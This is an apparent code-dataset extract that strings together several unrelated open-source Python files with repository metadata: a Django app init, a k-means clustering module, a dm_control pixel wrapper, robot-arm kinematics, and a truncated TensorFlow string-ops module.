"BSD-3-Clause"
] | null | null | null | location/__init__.py | ohahlev/ahlev-django-location | 7d6060ab7b21509f53790f5863b596f2b95c286a | [
"BSD-3-Clause"
] | null | null | null | location/__init__.py | ohahlev/ahlev-django-location | 7d6060ab7b21509f53790f5863b596f2b95c286a | [
"BSD-3-Clause"
] | null | null | null | __version__ = '0.0.1'
default_app_config = 'location.apps.LocationConfig' | 36.5 | 51 | 0.794521 |
b44012476dcbb844bbfc20d20557a77c55b1cc84 | 13,262 | py | Python | machine_learning/k_means_clust.py | TeddyFirman/Algorithm_Python | edbd50a97a62c2beb2a187e4c411c677aa43115e | [
"MIT"
] | null | null | null | machine_learning/k_means_clust.py | TeddyFirman/Algorithm_Python | edbd50a97a62c2beb2a187e4c411c677aa43115e | [
"MIT"
] | null | null | null | machine_learning/k_means_clust.py | TeddyFirman/Algorithm_Python | edbd50a97a62c2beb2a187e4c411c677aa43115e | [
"MIT"
] | null | null | null | """README, Author - Anurag Kumar(mailto:anuragkumarak95@gmail.com)
Requirements:
- sklearn
- numpy
- matplotlib
Python:
- 3.5
Inputs:
- X , a 2D numpy array of features.
- k , number of clusters to create.
    - initial_centroids , initial centroid values generated by utility function (mentioned
in usage).
- maxiter , maximum number of iterations to process.
    - heterogeneity , empty list that will be filled with heterogeneity values if passed
to kmeans func.
Usage:
    1. define 'k' value, 'X' features array and 'heterogeneity' empty list
2. create initial_centroids,
initial_centroids = get_initial_centroids(
X,
k,
seed=0 # seed value for initial centroid generation,
# None for randomness(default=None)
)
3. find centroids and clusters using kmeans function.
centroids, cluster_assignment = kmeans(
X,
k,
initial_centroids,
maxiter=400,
record_heterogeneity=heterogeneity,
verbose=True # whether to print logs in console or not.(default=False)
)
    4. Plot the loss function, i.e. the heterogeneity values for every iteration saved in
    the heterogeneity list.
plot_heterogeneity(
heterogeneity,
k
)
    5. Transfer the DataFrame into a report (e.g. for export to Excel); it must have a
    feature called 'Cluster' with the k-means cluster numbers in it.
"""
import warnings
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from sklearn.metrics import pairwise_distances
warnings.filterwarnings("ignore")
TAG = "K-MEANS-CLUST/ "
def get_initial_centroids(data, k, seed=None):
"""Randomly choose k data points as initial centroids"""
if seed is not None: # useful for obtaining consistent results
np.random.seed(seed)
n = data.shape[0] # number of data points
# Pick K indices from range [0, N).
rand_indices = np.random.randint(0, n, k)
# Keep centroids as dense format, as many entries will be nonzero due to averaging.
# As long as at least one document in a cluster contains a word,
# it will carry a nonzero weight in the TF-IDF vector of the centroid.
centroids = data[rand_indices, :]
return centroids
def centroid_pairwise_dist(X, centroids):
return pairwise_distances(X, centroids, metric="euclidean")
def assign_clusters(data, centroids):
# Compute distances between each data point and the set of centroids:
# Fill in the blank (RHS only)
distances_from_centroids = centroid_pairwise_dist(data, centroids)
# Compute cluster assignments for each data point:
# Fill in the blank (RHS only)
cluster_assignment = np.argmin(distances_from_centroids, axis=1)
return cluster_assignment
def revise_centroids(data, k, cluster_assignment):
new_centroids = []
for i in range(k):
# Select all data points that belong to cluster i. Fill in the blank (RHS only)
member_data_points = data[cluster_assignment == i]
# Compute the mean of the data points. Fill in the blank (RHS only)
centroid = member_data_points.mean(axis=0)
new_centroids.append(centroid)
new_centroids = np.array(new_centroids)
return new_centroids
def compute_heterogeneity(data, k, centroids, cluster_assignment):
heterogeneity = 0.0
for i in range(k):
# Select all data points that belong to cluster i. Fill in the blank (RHS only)
member_data_points = data[cluster_assignment == i, :]
if member_data_points.shape[0] > 0: # check if i-th cluster is non-empty
# Compute distances from centroid to data points (RHS only)
distances = pairwise_distances(
member_data_points, [centroids[i]], metric="euclidean"
)
squared_distances = distances ** 2
heterogeneity += np.sum(squared_distances)
return heterogeneity
def plot_heterogeneity(heterogeneity, k):
plt.figure(figsize=(7, 4))
plt.plot(heterogeneity, linewidth=4)
plt.xlabel("# Iterations")
plt.ylabel("Heterogeneity")
plt.title(f"Heterogeneity of clustering over time, K={k:d}")
plt.rcParams.update({"font.size": 16})
plt.show()
def kmeans(
data, k, initial_centroids, maxiter=500, record_heterogeneity=None, verbose=False
):
"""This function runs k-means on given data and initial set of centroids.
maxiter: maximum number of iterations to run.(default=500)
record_heterogeneity: (optional) a list, to store the history of heterogeneity
as function of iterations
if None, do not store the history.
verbose: if True, print how many data points changed their cluster labels in
each iteration"""
centroids = initial_centroids[:]
prev_cluster_assignment = None
for itr in range(maxiter):
if verbose:
print(itr, end="")
# 1. Make cluster assignments using nearest centroids
cluster_assignment = assign_clusters(data, centroids)
# 2. Compute a new centroid for each of the k clusters, averaging all data
# points assigned to that cluster.
centroids = revise_centroids(data, k, cluster_assignment)
# Check for convergence: if none of the assignments changed, stop
if (
prev_cluster_assignment is not None
and (prev_cluster_assignment == cluster_assignment).all()
):
break
# Print number of new assignments
if prev_cluster_assignment is not None:
num_changed = np.sum(prev_cluster_assignment != cluster_assignment)
if verbose:
print(
" {:5d} elements changed their cluster assignment.".format(
num_changed
)
)
# Record heterogeneity convergence metric
if record_heterogeneity is not None:
# YOUR CODE HERE
score = compute_heterogeneity(data, k, centroids, cluster_assignment)
record_heterogeneity.append(score)
prev_cluster_assignment = cluster_assignment[:]
return centroids, cluster_assignment
# Mock test below
if False: # change to true to run this test case.
from sklearn import datasets as ds
dataset = ds.load_iris()
k = 3
heterogeneity = []
initial_centroids = get_initial_centroids(dataset["data"], k, seed=0)
centroids, cluster_assignment = kmeans(
dataset["data"],
k,
initial_centroids,
maxiter=400,
record_heterogeneity=heterogeneity,
verbose=True,
)
plot_heterogeneity(heterogeneity, k)
def ReportGenerator(
df: pd.DataFrame, ClusteringVariables: np.ndarray, FillMissingReport=None
) -> pd.DataFrame:
"""
    Function generates an easy-reading clustering report. It takes 3 arguments as input:
        DataFrame - dataframe with a predicted cluster column;
        ClusteringVariables - variables used for clustering, which get marked in the report;
        FillMissingReport - dictionary of rules for how missing
        values are filled for the final report (not included in modeling);
in order to run the function following libraries must be imported:
import pandas as pd
import numpy as np
>>> data = pd.DataFrame()
>>> data['numbers'] = [1, 2, 3]
>>> data['col1'] = [0.5, 2.5, 4.5]
>>> data['col2'] = [100, 200, 300]
>>> data['col3'] = [10, 20, 30]
>>> data['Cluster'] = [1, 1, 2]
>>> ReportGenerator(data, ['col1', 'col2'], 0)
Features Type Mark 1 2
0 # of Customers ClusterSize False 2.000000 1.000000
1 % of Customers ClusterProportion False 0.666667 0.333333
2 col1 mean_with_zeros True 1.500000 4.500000
3 col2 mean_with_zeros True 150.000000 300.000000
4 numbers mean_with_zeros False 1.500000 3.000000
.. ... ... ... ... ...
99 dummy 5% False 1.000000 1.000000
100 dummy 95% False 1.000000 1.000000
101 dummy stdev False 0.000000 NaN
102 dummy mode False 1.000000 1.000000
103 dummy median False 1.000000 1.000000
<BLANKLINE>
[104 rows x 5 columns]
"""
# Fill missing values with given rules
if FillMissingReport:
df.fillna(value=FillMissingReport, inplace=True)
df["dummy"] = 1
numeric_cols = df.select_dtypes(np.number).columns
report = (
df.groupby(["Cluster"])[ # construct report dataframe
numeric_cols
] # group by cluster number
.agg(
[
("sum", np.sum),
("mean_with_zeros", lambda x: np.mean(np.nan_to_num(x))),
("mean_without_zeros", lambda x: x.replace(0, np.NaN).mean()),
(
"mean_25-75",
lambda x: np.mean(
np.nan_to_num(
sorted(x)[
round(len(x) * 25 / 100) : round(len(x) * 75 / 100)
]
)
),
),
("mean_with_na", np.mean),
("min", lambda x: x.min()),
("5%", lambda x: x.quantile(0.05)),
("25%", lambda x: x.quantile(0.25)),
("50%", lambda x: x.quantile(0.50)),
("75%", lambda x: x.quantile(0.75)),
("95%", lambda x: x.quantile(0.95)),
("max", lambda x: x.max()),
("count", lambda x: x.count()),
("stdev", lambda x: x.std()),
("mode", lambda x: x.mode()[0]),
("median", lambda x: x.median()),
("# > 0", lambda x: (x > 0).sum()),
]
)
.T.reset_index()
.rename(index=str, columns={"level_0": "Features", "level_1": "Type"})
) # rename columns
# calculate the size of cluster(count of clientID's)
clustersize = report[
(report["Features"] == "dummy") & (report["Type"] == "count")
].copy() # avoid SettingWithCopyWarning
clustersize.Type = (
"ClusterSize" # rename created cluster df to match report column names
)
clustersize.Features = "# of Customers"
clusterproportion = pd.DataFrame(
clustersize.iloc[:, 2:].values
/ clustersize.iloc[:, 2:].values.sum() # calculating the proportion of cluster
)
clusterproportion[
"Type"
] = "% of Customers" # rename created cluster df to match report column names
clusterproportion["Features"] = "ClusterProportion"
cols = clusterproportion.columns.tolist()
cols = cols[-2:] + cols[:-2]
clusterproportion = clusterproportion[cols] # rearrange columns to match report
clusterproportion.columns = report.columns
a = pd.DataFrame(
abs(
report[report["Type"] == "count"].iloc[:, 2:].values
- clustersize.iloc[:, 2:].values
)
) # generating df with count of nan values
a["Features"] = 0
a["Type"] = "# of nan"
a.Features = report[
report["Type"] == "count"
].Features.tolist() # filling values in order to match report
cols = a.columns.tolist()
cols = cols[-2:] + cols[:-2]
a = a[cols] # rearrange columns to match report
a.columns = report.columns # rename columns to match report
report = report.drop(
report[report.Type == "count"].index
) # drop count values except cluster size
report = pd.concat(
[report, a, clustersize, clusterproportion], axis=0
) # concat report with clustert size and nan values
report["Mark"] = report["Features"].isin(ClusteringVariables)
cols = report.columns.tolist()
cols = cols[0:2] + cols[-1:] + cols[2:-1]
report = report[cols]
sorter1 = {
"ClusterSize": 9,
"ClusterProportion": 8,
"mean_with_zeros": 7,
"mean_with_na": 6,
"max": 5,
"50%": 4,
"min": 3,
"25%": 2,
"75%": 1,
"# of nan": 0,
"# > 0": -1,
"sum_with_na": -2,
}
report = (
report.assign(
Sorter1=lambda x: x.Type.map(sorter1),
Sorter2=lambda x: list(reversed(range(len(x)))),
)
.sort_values(["Sorter1", "Mark", "Sorter2"], ascending=False)
.drop(["Sorter1", "Sorter2"], axis=1)
)
report.columns.name = ""
report = report.reset_index()
report.drop(columns=["index"], inplace=True)
return report
if __name__ == "__main__":
import doctest
doctest.testmod()
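    # A small synthetic demonstration (a sketch only: the blob data, k=3 and the
    # hand-picked initial centroids are arbitrary choices) of the helpers above.
    rng = np.random.default_rng(0)
    blobs = np.vstack(
        [rng.normal(loc, 0.5, size=(50, 2)) for loc in (0.0, 5.0, 10.0)]
    )
    demo_heterogeneity = []
    initial = blobs[[0, 50, 100], :]  # one seed point drawn from each blob
    centroids, assignment = kmeans(
        blobs,
        3,
        initial,
        maxiter=100,
        record_heterogeneity=demo_heterogeneity,
        verbose=False,
    )
    print("final heterogeneity:", demo_heterogeneity[-1])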
| 37.463277 | 89 | 0.57661 |
da66865ef4504b413d256162bc5ab22b217c46d1 | 4,451 | py | Python | dm_control/suite/wrappers/pixels.py | hzm2016/dm_control | c24ec9f5f3cb3c25c6571c89c9f60bf3350f5711 | [
"Apache-2.0"
] | 2 | 2019-02-14T23:41:45.000Z | 2022-02-10T04:08:44.000Z | dm_control/suite/wrappers/pixels.py | jiajunhua/deepmind-dm_control | c24ec9f5f3cb3c25c6571c89c9f60bf3350f5711 | [
"Apache-2.0"
] | 1 | 2019-03-02T13:37:17.000Z | 2019-03-02T13:37:17.000Z | dm_control/suite/wrappers/pixels.py | svikramank/dm_control | c24ec9f5f3cb3c25c6571c89c9f60bf3350f5711 | [
"Apache-2.0"
] | 1 | 2018-11-20T04:39:05.000Z | 2018-11-20T04:39:05.000Z | # Copyright 2017 The dm_control Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Wrapper that adds pixel observations to a control environment."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
# Internal dependencies.
from dm_control.rl import environment
from dm_control.rl import specs
STATE_KEY = 'state'
class Wrapper(environment.Base):
"""Wraps a control environment and adds a rendered pixel observation."""
def __init__(self, env, pixels_only=True, render_kwargs=None,
observation_key='pixels'):
"""Initializes a new pixel Wrapper.
Args:
env: The environment to wrap.
pixels_only: If True (default), the original set of 'state' observations
returned by the wrapped environment will be discarded, and the
`OrderedDict` of observations will only contain pixels. If False, the
`OrderedDict` will contain the original observations as well as the
pixel observations.
render_kwargs: Optional `dict` containing keyword arguments passed to the
`mujoco.Physics.render` method.
observation_key: Optional custom string specifying the pixel observation's
key in the `OrderedDict` of observations. Defaults to 'pixels'.
Raises:
ValueError: If `env`'s observation spec is not compatible with the
wrapper. Supported formats are a single array, or a dict of arrays.
ValueError: If `env`'s observation already contains the specified
`observation_key`.
"""
if render_kwargs is None:
render_kwargs = {}
wrapped_observation_spec = env.observation_spec()
if isinstance(wrapped_observation_spec, specs.ArraySpec):
self._observation_is_dict = False
invalid_keys = set([STATE_KEY])
elif isinstance(wrapped_observation_spec, collections.MutableMapping):
self._observation_is_dict = True
invalid_keys = set(wrapped_observation_spec.keys())
else:
raise ValueError('Unsupported observation spec structure.')
if not pixels_only and observation_key in invalid_keys:
raise ValueError('Duplicate or reserved observation key {!r}.'
.format(observation_key))
if pixels_only:
self._observation_spec = collections.OrderedDict()
elif self._observation_is_dict:
self._observation_spec = wrapped_observation_spec.copy()
else:
self._observation_spec = collections.OrderedDict()
self._observation_spec[STATE_KEY] = wrapped_observation_spec
# Extend observation spec.
pixels = env.physics.render(**render_kwargs)
pixels_spec = specs.ArraySpec(
shape=pixels.shape, dtype=pixels.dtype, name=observation_key)
self._observation_spec[observation_key] = pixels_spec
self._env = env
self._pixels_only = pixels_only
self._render_kwargs = render_kwargs
self._observation_key = observation_key
def reset(self):
time_step = self._env.reset()
return self._add_pixel_observation(time_step)
def step(self, action):
time_step = self._env.step(action)
return self._add_pixel_observation(time_step)
def observation_spec(self):
return self._observation_spec
def action_spec(self):
return self._env.action_spec()
def _add_pixel_observation(self, time_step):
if self._pixels_only:
observation = collections.OrderedDict()
elif self._observation_is_dict:
observation = type(time_step.observation)(time_step.observation)
else:
observation = collections.OrderedDict()
observation[STATE_KEY] = time_step.observation
pixels = self._env.physics.render(**self._render_kwargs)
observation[self._observation_key] = pixels
return time_step._replace(observation=observation)
def __getattr__(self, name):
return getattr(self._env, name)
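# A hedged usage sketch: wrap a suite task so that observations carry an 84x84
# RGB array under the default 'pixels' key. The domain/task names and render
# sizes below are placeholder choices.
if __name__ == '__main__':
  from dm_control import suite
  env = suite.load(domain_name='cartpole', task_name='swingup')
  env = Wrapper(env, pixels_only=True,
                render_kwargs={'height': 84, 'width': 84, 'camera_id': 0})
  time_step = env.reset()
  print(time_step.observation['pixels'].shape)  # e.g. (84, 84, 3)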
| 36.186992 | 80 | 0.722759 |
fefd085238abf72e3dddfcd2ba0f9969aea664cc | 7,104 | py | Python | kuka_arm/scripts/kinematics/kinematics.py | TheoKanning/RoboND-Kinematics-Project | f7c8d622b21db68174f4bb251ca3757a74d15db6 | [
"MIT"
] | null | null | null | kuka_arm/scripts/kinematics/kinematics.py | TheoKanning/RoboND-Kinematics-Project | f7c8d622b21db68174f4bb251ca3757a74d15db6 | [
"MIT"
] | null | null | null | kuka_arm/scripts/kinematics/kinematics.py | TheoKanning/RoboND-Kinematics-Project | f7c8d622b21db68174f4bb251ca3757a74d15db6 | [
"MIT"
] | null | null | null | import numpy as np
from sympy import symbols, cos, sin, pi, simplify, Transpose
from math import atan2, sqrt, acos
from sympy.matrices import Matrix
# Symbols
q1, q2, q3, q4, q5, q6, q7 = symbols('q1:8')
d1, d2, d3, d4, d5, d6, d7 = symbols('d1:8')
a0, a1, a2, a3, a4, a5, a6 = symbols('a0:7')
alpha0, alpha1, alpha2, alpha3, alpha4, alpha5, alpha6 = symbols('alpha0:7')
# DH Parameters
s = {alpha0: 0, a0: 0, d1: 0.75,
alpha1: -pi/2, a1: 0.35, d2: 0, q2: q2-pi/2,
alpha2: 0, a2: 1.25, d3: 0,
alpha3: -pi/2, a3: -0.054, d4: 1.50,
alpha4: pi/2, a4: 0, d5: 0,
alpha5: -pi/2, a5: 0, d6: 0,
alpha6: 0, a6: 0, d7: 0.303, q7: 0}
q = symbols('q')
a = symbols('a')
alpha = symbols('alpha')
d = symbols('d')
BASE_T = Matrix([[cos(q), -sin(q), 0, a],
[sin(q) * cos(alpha), cos(q) * cos(alpha), -sin(alpha), -sin(alpha) * d],
[sin(q) * sin(alpha), cos(q) * sin(alpha), cos(alpha), cos(alpha) * d],
[0, 0, 0, 1]])
# Substitute DH parameters into base matrix to create joint transforms
T0_1 = BASE_T.subs({alpha: alpha0, a: a0, d: d1, q: q1}).subs(s)
T1_2 = BASE_T.subs({alpha: alpha1, a: a1, d: d2, q: q2}).subs(s)
T2_3 = BASE_T.subs({alpha: alpha2, a: a2, d: d3, q: q3}).subs(s)
T3_4 = BASE_T.subs({alpha: alpha3, a: a3, d: d4, q: q4}).subs(s)
T4_5 = BASE_T.subs({alpha: alpha4, a: a4, d: d5, q: q5}).subs(s)
T5_6 = BASE_T.subs({alpha: alpha5, a: a5, d: d6, q: q6}).subs(s)
T6_G = BASE_T.subs({alpha: alpha6, a: a6, d: d7, q: q7}).subs(s)
def print_matrix(matrix):
# print in markdown table format
print("col 1 | col 2 | col 3 | col 4")
print("---|---|---|---")
for row in range(matrix.shape[0]):
output = ""
for col in range(matrix.shape[1]):
output += str(matrix[row, col])
if col != matrix.shape[1] - 1:
output += " | "
print(output)
print_matrix((T3_4 * T4_5 * T5_6))
# Gripper link orientation correction
R_z = Matrix([[cos(np.pi), -sin(np.pi), 0, 0],
[sin(np.pi), cos(np.pi), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]])
R_y = Matrix([[cos(-np.pi/2), 0, sin(-np.pi/2), 0],
[0, 1, 0, 0],
[-sin(-np.pi/2), 0, cos(-np.pi/2), 0],
[0, 0, 0, 1]])
R_corr = R_z * R_y
def get_forward(angles):
"""
Calculates EE position and orientation given joint angles
returns ([x, y, z], [x, y, z, w])
"""
transform = T0_1.evalf(subs={q1: angles[0]})
transform *= T1_2.evalf(subs={q2: angles[1]})
transform *= T2_3.evalf(subs={q3: angles[2]})
transform *= T3_4.evalf(subs={q4: angles[3]})
transform *= T4_5.evalf(subs={q5: angles[4]})
transform *= T5_6.evalf(subs={q6: angles[5]})
transform *= T6_G
transform *= R_corr.evalf()
rotation = angles_from_transform(transform)
x = transform[0, 3]
y = transform[1, 3]
z = transform[2, 3]
return [x, y, z], rotation
def angles_from_transform(transform):
"""
    Returns the Euler angles corresponding to the rotation part of the given homogeneous transform
:param transform: 4x4 Matrix object
:return: (roll, pitch, yaw)
"""
matrix = transform.evalf()
r11 = matrix[0, 0]
r21 = matrix[1, 0]
r31 = matrix[2, 0]
r32 = matrix[2, 1]
r33 = matrix[2, 2]
yaw = atan2(r21, r11)
pitch = atan2(-r31, sqrt(r11**2 + r21**2))
roll = atan2(r32, r33)
return roll, pitch, yaw
def wrist_angles_from_transform(transform):
"""
Returns the necessary wrist joint angles to create the required transformation
:param transform: Matrix object
:return: theta4, theta5, theta6
"""
matrix = transform.evalf()
r13 = matrix[0, 2]
r21 = matrix[1, 0]
r22 = matrix[1, 1]
r23 = matrix[1, 2]
r33 = matrix[2, 2]
# calculated by me
theta4 = atan2(r33, -r13)
theta5 = atan2(sqrt(r22 ** 2 + r21 ** 2), r23)
theta6 = atan2(-r22, r21)
return theta4, theta5, theta6
def create_rotation_matrix(angles):
"""
Returns a rotation matrix that will produce the given Euler angles
:param angles: (roll, pitch, yaw)
"""
R_x = Matrix([[1, 0, 0],
[0, cos(q), -sin(q)],
[0, sin(q), cos(q)]]).evalf(subs={q: angles[0]})
R_y = Matrix([[cos(q), 0, sin(q)],
[0, 1, 0],
[-sin(q), 0, cos(q)]]).evalf(subs={q: angles[1]})
R_z = Matrix([[cos(q), -sin(q), 0],
[sin(q), cos(q), 0],
[0, 0, 1]]).evalf(subs={q: angles[2]})
return R_z * R_y * R_x
def get_corrected_total_rotation(angles):
"""
Return the rotation matrix corresponding to the given gripper angles, taking into account the correction matrix
:param angles: [roll, pitch, yaw] in radians
:return: 3x3 Matrix
"""
return create_rotation_matrix(angles) * R_corr[:3, :3]
def get_wrist_center(ee_position, ee_orientation):
"""
Return the wrist center for a given ee position and orientation
"""
gripper_position = Matrix(ee_position)
r0_6 = get_corrected_total_rotation(ee_orientation)
# d7 is distance from joint 6 to gripper
displacement = r0_6 * Matrix([[0], [0], [d7]]).evalf(subs=s)
wc_position = gripper_position - displacement
return wc_position
def get_first_three_joints(wrist_pos):
"""
Calculate angles of the first three joints for the given wrist position
:param wrist_pos: (x, y, z)
:return: (joint1, joint2, joint3)
"""
# project onto xy plane
theta1 = atan2(wrist_pos[1], wrist_pos[0])
def law_of_cosines(a, b, c):
"""
Return angle given lengths of sides a, b, and c
"""
return acos((c ** 2 - a ** 2 - b ** 2) / (-2 * a * b))
link2 = s[a2]
link3 = sqrt(s[a3]**2 + s[d4]**2)
# wrist position projected onto plane of arm, minus joint 2 position
projected_wc = sqrt(wrist_pos[0]**2 + wrist_pos[1]**2) - s[a1], wrist_pos[2] - s[d1]
d2_wc = sqrt(projected_wc[0]**2 + projected_wc[1]**2)
# theta 2 is equal to the triangle angle plus the angle of the wc
theta2 = law_of_cosines(link2, d2_wc, link3) + atan2(projected_wc[1], projected_wc[0])
    theta2 = -theta2 + np.pi / 2  # correct for joint 2 orientation
# add correction because link is not straight
theta3 = - law_of_cosines(link2, link3, d2_wc) + np.pi/2 + atan2(s[a3], s[d4])
return theta1, theta2, theta3
def get_inverse(position, orientation):
"""
Given the desired position and orientation of the end effector, calculate the required joint angles
:param position:
:param orientation:
:return:
"""
wc = get_wrist_center(position, orientation)
theta1, theta2, theta3 = get_first_three_joints(wc)
r0_3 = (T0_1 * T1_2 * T2_3).evalf(subs={q1: theta1, q2: theta2, q3: theta3})[:3, :3]
r0_6 = get_corrected_total_rotation(orientation)
r3_6 = Transpose(r0_3) * r0_6
theta4, theta5, theta6 = wrist_angles_from_transform(r3_6)
return theta1, theta2, theta3, theta4, theta5, theta6
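# ---------------------------------------------------------------------------
# Hedged round-trip check (added for illustration; not part of the original
# file).  The joint angles below are arbitrary example values; the recovered
# angles should match the inputs up to numerical precision and IK branch
# choices.
if __name__ == '__main__':
    example_angles = [0.1, -0.2, 0.3, 0.0, 0.5, -0.1]
    position, orientation = get_forward(example_angles)
    recovered = get_inverse(position, orientation)
    print('input angles:    ', example_angles)
    print('recovered angles:', [float(a) for a in recovered])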
| 31.856502 | 115 | 0.586149 |
113795df6298a28b96a9970379646d5627f1ba5e | 21,823 | py | Python | tensorflow/python/ops/string_ops.py | joshz123/tensorflow | 7841ca029060ab78e221e757d4b1ee6e3e0ffaa4 | [
"Apache-2.0"
] | 57 | 2017-09-03T07:08:31.000Z | 2022-02-28T04:33:42.000Z | tensorflow/python/ops/string_ops.py | joshz123/tensorflow | 7841ca029060ab78e221e757d4b1ee6e3e0ffaa4 | [
"Apache-2.0"
] | 58 | 2021-11-22T05:41:28.000Z | 2022-01-19T01:33:40.000Z | tensorflow/python/ops/string_ops.py | joshz123/tensorflow | 7841ca029060ab78e221e757d4b1ee6e3e0ffaa4 | [
"Apache-2.0"
] | 66 | 2020-05-15T10:05:12.000Z | 2022-02-14T07:28:18.000Z | # -*- coding: utf-8 -*-
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operations for working with string Tensors."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_parsing_ops
from tensorflow.python.ops import gen_string_ops
from tensorflow.python.ops import math_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
# pylint: disable=g-bad-import-order
from tensorflow.python.ops.gen_string_ops import *
from tensorflow.python.util import compat as util_compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import dispatch
from tensorflow.python.util.tf_export import tf_export
# pylint: enable=g-bad-import-order
# pylint: enable=wildcard-import
# pylint: disable=redefined-builtin
@tf_export("strings.regex_full_match")
@dispatch.add_dispatch_support
def regex_full_match(input, pattern, name=None):
r"""Match elements of `input` with regex `pattern`.
Args:
input: string `Tensor`, the source strings to process.
pattern: string or scalar string `Tensor`, regular expression to use,
see more details at https://github.com/google/re2/wiki/Syntax
name: Name of the op.
Returns:
bool `Tensor` of the same shape as `input` with match results.
"""
if isinstance(pattern, util_compat.bytes_or_text_types):
# When `pattern` is static through the life of the op we can
# use a version which performs the expensive regex compilation once at
# creation time.
return gen_string_ops.static_regex_full_match(
input=input, pattern=pattern, name=name)
return gen_string_ops.regex_full_match(
input=input, pattern=pattern, name=name)
regex_full_match.__doc__ = gen_string_ops.regex_full_match.__doc__
@tf_export(
"strings.regex_replace", v1=["strings.regex_replace", "regex_replace"])
@deprecation.deprecated_endpoints("regex_replace")
@dispatch.add_dispatch_support
def regex_replace(input, pattern, rewrite, replace_global=True, name=None):
r"""Replace elements of `input` matching regex `pattern` with `rewrite`.
>>> tf.strings.regex_replace("Text with tags.<br /><b>contains html</b>",
... "<[^>]+>", " ")
<tf.Tensor: shape=(), dtype=string, numpy=b'Text with tags. contains html '>
Args:
input: string `Tensor`, the source strings to process.
pattern: string or scalar string `Tensor`, regular expression to use,
see more details at https://github.com/google/re2/wiki/Syntax
rewrite: string or scalar string `Tensor`, value to use in match
      replacement, supports backslash-escaped digits (\1 to \9), which can be
      used to insert the text matching the corresponding parenthesized group.
replace_global: `bool`, if `True` replace all non-overlapping matches,
else replace only the first match.
name: A name for the operation (optional).
Returns:
string `Tensor` of the same shape as `input` with specified replacements.
"""
if (isinstance(pattern, util_compat.bytes_or_text_types) and
isinstance(rewrite, util_compat.bytes_or_text_types)):
# When `pattern` and `rewrite` are static through the life of the op we can
# use a version which performs the expensive regex compilation once at
# creation time.
return gen_string_ops.static_regex_replace(
input=input, pattern=pattern,
rewrite=rewrite, replace_global=replace_global,
name=name)
return gen_string_ops.regex_replace(
input=input, pattern=pattern,
rewrite=rewrite, replace_global=replace_global,
name=name)
@tf_export("strings.format")
def string_format(template, inputs, placeholder="{}", summarize=3, name=None):
r"""Formats a string template using a list of tensors.
Formats a string template using a list of tensors, abbreviating tensors by
only printing the first and last `summarize` elements of each dimension
(recursively). If formatting only one tensor into a template, the tensor does
not have to be wrapped in a list.
Example:
Formatting a single-tensor template:
```python
sess = tf.compat.v1.Session()
with sess.as_default():
tensor = tf.range(10)
formatted = tf.strings.format("tensor: {}, suffix", tensor)
out = sess.run(formatted)
expected = "tensor: [0 1 2 ... 7 8 9], suffix"
assert(out.decode() == expected)
```
Formatting a multi-tensor template:
```python
sess = tf.compat.v1.Session()
with sess.as_default():
tensor_one = tf.reshape(tf.range(100), [10, 10])
tensor_two = tf.range(10)
formatted = tf.strings.format("first: {}, second: {}, suffix",
(tensor_one, tensor_two))
out = sess.run(formatted)
expected = ("first: [[0 1 2 ... 7 8 9]\n"
" [10 11 12 ... 17 18 19]\n"
" [20 21 22 ... 27 28 29]\n"
" ...\n"
" [70 71 72 ... 77 78 79]\n"
" [80 81 82 ... 87 88 89]\n"
" [90 91 92 ... 97 98 99]], second: [0 1 2 ... 7 8 9], suffix")
assert(out.decode() == expected)
```
Args:
template: A string template to format tensor values into.
inputs: A list of `Tensor` objects, or a single Tensor.
The list of tensors to format into the template string. If a solitary
tensor is passed in, the input tensor will automatically be wrapped as a
list.
placeholder: An optional `string`. Defaults to `{}`.
At each placeholder occurring in the template, a subsequent tensor
will be inserted.
summarize: An optional `int`. Defaults to `3`.
When formatting the tensors, show the first and last `summarize`
entries of each tensor dimension (recursively). If set to -1, all
elements of the tensor will be shown.
name: A name for the operation (optional).
Returns:
A scalar `Tensor` of type `string`.
Raises:
ValueError: if the number of placeholders does not match the number of
inputs.
"""
# If there is only one tensor to format, we will automatically wrap it in a
# list to simplify the user experience
if tensor_util.is_tensor(inputs):
inputs = [inputs]
if template.count(placeholder) != len(inputs):
raise ValueError("%s placeholder(s) in template does not match %s tensor(s)"
" provided as input" % (template.count(placeholder),
len(inputs)))
return gen_string_ops.string_format(inputs,
template=template,
placeholder=placeholder,
summarize=summarize,
name=name)
# Note: tf.strings.split is exported in ragged/ragged_string_ops.py, which
# defines a wrapper for this function.
def string_split(source, sep=None, skip_empty=True, delimiter=None): # pylint: disable=invalid-name
"""Split elements of `source` based on `delimiter` into a `SparseTensor`.
Let N be the size of source (typically N will be the batch size). Split each
element of `source` based on `delimiter` and return a `SparseTensor`
containing the split tokens. Empty tokens are ignored.
If `sep` is an empty string, each element of the `source` is split
into individual strings, each containing one byte. (This includes splitting
multibyte sequences of UTF-8.) If delimiter contains multiple bytes, it is
treated as a set of delimiters with each considered a potential split point.
For example:
N = 2, source[0] is 'hello world' and source[1] is 'a b c', then the output
will be
st.indices = [0, 0;
0, 1;
1, 0;
1, 1;
1, 2]
st.shape = [2, 3]
st.values = ['hello', 'world', 'a', 'b', 'c']
Args:
source: `1-D` string `Tensor`, the strings to split.
sep: `0-D` string `Tensor`, the delimiter character, the string should
be length 0 or 1. Default is ' '.
